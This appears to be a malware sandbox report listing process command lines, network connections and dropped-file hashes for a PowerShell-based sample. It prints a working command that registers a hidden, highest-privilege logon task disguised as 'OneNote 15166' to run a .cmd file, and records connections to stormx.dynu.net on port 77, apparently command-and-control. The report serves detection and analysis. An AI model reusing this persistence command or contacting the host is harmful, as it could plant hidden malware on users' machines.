"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network15166Man')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 stormx.dynu.net udp
DE 94.130.130.51:77 stormx.dynu.net tcp
DE 94.130.130.51:77 stormx.dynu.net tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
DE 94.130.130.51:77 stormx.dynu.net tcp

Files

memory/1916-0-0x0000000074F2E000-0x0000000074F2F000-memory.dmp

memory/1916-1-0x0000000004CD0000-0x0000000004D06000-memory.dmp

memory/1916-3-0x0000000005340000-0x0000000005968000-memory.dmp

memory/1916-2-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/1916-4-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/1916-5-0x00000000052C0000-0x00000000052E2000-memory.dmp

memory/1916-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

memory/1916-7-0x0000000005A50000-0x0000000005AB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puf2xrl2.0of.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1916-17-0x0000000005C40000-0x0000000005F94000-memory.dmp

memory/1916-18-0x00000000061C0000-0x00000000061DE000-memory.dmp

memory/1916-19-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/1916-20-0x0000000006720000-0x0000000006764000-memory.dmp

memory/1916-21-0x00000000074A0000-0x0000000007516000-memory.dmp

memory/1916-22-0x0000000007BA0000-0x000000000821A000-memory.dmp

memory/1916-23-0x0000000007540000-0x000000000755A000-memory.dmp

memory/3444-24-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/3444-25-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/3444-26-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/3444-38-0x0000000074F20000-0x00000000756D0000-memory.dmp

memory/1916-39-0x0000000007620000-0x0000000007630000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 938ffc2cba917b243d86b2cf76dcefb4
SHA1 234b53d91d075f16cc63c731eefdae278e2faad3
SHA256 5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca
SHA512 e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

memory/4824-50-0x0000000007AB0000-0x0000000007AE2000-memory.dmp

memory/4824-51-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

memory/4824-61-0x0000000007A90000-0x0000000007AAE000-memory.dmp

memory/4824-62-0x0000000007B00000-0x0000000007BA3000-memory.dmp

memory/4824-63-0x0000000007CC0000-0x0000000007CCA000-memory.dmp

memory/4824-64-0x0000000007EE0000-0x0000000007F76000-memory.dmp

memory/4824-65-0x0000000007E50000-0x0000000007E61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bc5e40517fe8f3f73fdd3a27d4fe7d6d
SHA1 0b0ea9ee27a747a5b6a4121de931dd15f0429bb4
SHA256 a7e28126148286b23e0a2e3146d2c7a7a4b5d780cc8ff50bb4e3f4c7f486a8c4
SHA512 c169fbf7c0a722abffd7802bbfc7559adacc3e7ba9ffcfe2825f2055d8860f8ddf90aa5ecffb2c9b7e8bdb409479870c463048af1d98e161ad854644f45f0eaf

memory/800-77-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ca86c56c43469d64429b0ceac9a6244a
SHA1 096af882cffc54003eb90c70ea0e7430bab218ce
SHA256 8e9e05e948ea3ae93545f3c079e718a24d2b3224fa1686eae5fbe3621d74059c
SHA512 634c878e298022da59fdcc2c33b6514bf5d45d6e4d893d2646c63e1922e5066c98b88d7c09256e6aadeba18012406fb896ff2b337eb16f886d162493979adeeb

C:\Users\Admin\AppData\Roaming\Network15166Man.cmd

MD5 3dfb1c3ff09dc31a4096b821b9ff204b
SHA1 8604c300175bf352b7612412c6521064a2514674
SHA256 a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b
SHA512 895cfb222d6b20b9761188531a3ba45df6f7f799aaf760c14c2de4892947a124c35bcd66e20e98cf62bd4c635c46fc5f8ab6d8c7207a081d98b2b8b31a47e172

memory/1916-111-0x0000000074F20000-0x00000000756D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 86340a2269cc2e3ed5f72aff7c6e87b7
SHA1 ed4e05673352bf376a4ea5a0a3c81e935f68bbd7
SHA256 1238383796584fcf9f5bfd63424b06b685dc73b18edf53bf52114cdc58363ffc
SHA512 9df41060170fed81a12aca98c3f6183201c3636bb1f76f7e2b3ccb7d0be66b523bb16f28d8d1501238bcf9b2bca527c84c206334239b0ee2566286b782c705ca

memory/4212-123-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

memory/4212-133-0x00000000072E0000-0x0000000007383000-memory.dmp

memory/4212-134-0x0000000007640000-0x0000000007651000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 632280a520f1aaf45cee26c44f846468
SHA1 69f0e1002e99101089e42072f0c8505a5f542353
SHA256 122dbb93b1e8f381b06abf0cb7901ea14709b57c941b2e16abb4c2d70efd1018
SHA512 94237bdbdd13df82ca75362878fee31f8ca9952c872cd2961f27ee99d9bf9f4718e9bfab12f4e59a520ee10fdbc10596d995f2dcbfc2117a3389012b61078eed

memory/4344-146-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

memory/464-157-0x0000000005290000-0x00000000052A6000-memory.dmp

memory/464-158-0x0000000008B60000-0x0000000009104000-memory.dmp

memory/464-159-0x0000000007E70000-0x0000000007F02000-memory.dmp

memory/464-160-0x0000000007E50000-0x0000000007E5A000-memory.dmp